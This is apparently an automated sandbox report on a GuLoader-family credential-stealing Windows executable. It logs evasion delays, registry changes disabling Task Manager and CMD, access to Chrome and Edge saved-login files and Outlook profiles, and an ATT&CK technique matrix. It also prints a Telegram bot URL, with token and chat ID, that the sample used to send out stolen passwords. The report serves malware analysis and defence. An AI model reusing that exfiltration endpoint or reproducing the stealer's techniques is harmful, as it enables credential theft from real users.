            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -593735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -593610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exe TID: 6792Thread sleep time: -593485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_00402868 FindFirstFileW,6_2_00402868
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_0040672B FindFirstFileW,FindClose,6_2_0040672B
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405AFA
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599884Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599539Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598953Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598719Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597222Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596999Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596846Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596725Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596594Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596452Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594826Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 593860Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 593735Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 593610Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeThread delayed: delay time: 593485Jump to behavior
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3412063078.0000000006748000.00000004.00000020.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3412063078.000000000679D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: 9Yn5tjyOgT.exe, 00000006.00000002.3412063078.000000000679D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeAPI call chain: ExitProcess graph end nodegraph_0-4591
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeAPI call chain: ExitProcess graph end nodegraph_0-4746
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,6_2_00401E49
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_738E1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_738E1B5F
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeProcess created: C:\Users\user\Desktop\9Yn5tjyOgT.exe "C:\Users\user\Desktop\9Yn5tjyOgT.exe"Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeQueries volume information: C:\Users\user\Desktop\9Yn5tjyOgT.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 9Yn5tjyOgT.exe PID: 6068, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 9Yn5tjyOgT.exe PID: 6068, type: MEMORYSTR
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 9Yn5tjyOgT.exe PID: 6068, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 9Yn5tjyOgT.exe PID: 6068, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 9Yn5tjyOgT.exe PID: 6068, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            31
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory215
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            3
            Obfuscated Files or Information
            Security Account Manager211
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            21
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets41
            Virtualization/Sandbox Evasion
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            9Yn5tjyOgT.exe76%VirustotalBrowse
            9Yn5tjyOgT.exe66%ReversingLabsWin32.Trojan.GuLoader
            9Yn5tjyOgT.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp\System.dll0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.185.78
            truefalse
              high
              drive.usercontent.google.com
              142.250.185.129
              truefalse
                high
                reallyfreegeoip.org
                104.21.32.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189false
                            high
                            http://checkip.dyndns.org/false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegram.org9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F62000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F02000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://checkip.dyndns.org/I69Yn5tjyOgT.exe, 00000006.00000003.2948789931.0000000006836000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/bot9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://translate.google.com/translate_a/element.js9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=20659Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F02000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.usercontent.google.com/9Yn5tjyOgT.exe, 00000006.00000003.2930366052.00000000067B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://checkip.dyndns.org9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F62000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D63000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://nsis.sf.net/NSIS_ErrorError9Yn5tjyOgT.exefalse
                                              high
                                              https://drive.usercontent.google.com/)-pr9Yn5tjyOgT.exe, 00000006.00000003.2930366052.00000000067B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.org/D9o9Yn5tjyOgT.exe, 00000006.00000002.3433775511.0000000039440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/9Yn5tjyOgT.exe, 00000006.00000002.3412063078.0000000006748000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://reallyfreegeoip.org9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://reallyfreegeoip.org9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://apis.google.com9Yn5tjyOgT.exe, 00000006.00000003.2895362637.00000000067F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://checkip.dyndns.com9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F62000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://api.telegram.org9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F62000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036F02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://checkip.dyndns.org/D9?9Yn5tjyOgT.exe, 00000006.00000002.3433775511.0000000039440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://drive.usercontent.google.com/69Yn5tjyOgT.exe, 00000006.00000002.3412063078.00000000067AD000.00000004.00000020.00020000.00000000.sdmp, 9Yn5tjyOgT.exe, 00000006.00000003.2930366052.00000000067B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://drive.usercontent.google.com/79Yn5tjyOgT.exe, 00000006.00000003.2930366052.00000000067B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://reallyfreegeoip.org/xml/9Yn5tjyOgT.exe, 00000006.00000002.3432675851.0000000036D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          142.250.185.78
                                                                          drive.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          149.154.167.220
                                                                          api.telegram.orgUnited Kingdom
                                                                          62041TELEGRAMRUfalse
                                                                          142.250.185.129
                                                                          drive.usercontent.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          104.21.32.1
                                                                          reallyfreegeoip.orgUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          132.226.247.73
                                                                          checkip.dyndns.comUnited States
                                                                          16989UTMEMUSfalse
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1588203
                                                                          Start date and time:2025-01-10 22:38:00 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 7m 28s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:7
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:9Yn5tjyOgT.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:927c3960a7d3c785ff7de3e89215dd9a895f27b2646011e34739201805b2b501.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/8@6/5
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 96%
                                                                          • Number of executed functions: 168
                                                                          • Number of non-executed functions: 112
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          16:40:28API Interceptor251x Sleep call for process: 9Yn5tjyOgT.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          149.154.167.2206ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              104.21.32.1QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.mzkd6gp5.top/3u0p/
                                                                                              SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                              • redroomaudio.com/administrator/index.php
                                                                                              132.226.247.736ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              reallyfreegeoip.orgVQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.48.1
                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 104.21.80.1
                                                                                              JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.21.16.1
                                                                                              lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.21.80.1
                                                                                              V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 104.21.32.1
                                                                                              upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.48.1
                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 104.21.16.1
                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 104.21.48.1
                                                                                              SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.64.1
                                                                                              oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.48.1
                                                                                              checkip.dyndns.comVQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.130.0
                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              • 132.226.247.73
                                                                                              JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
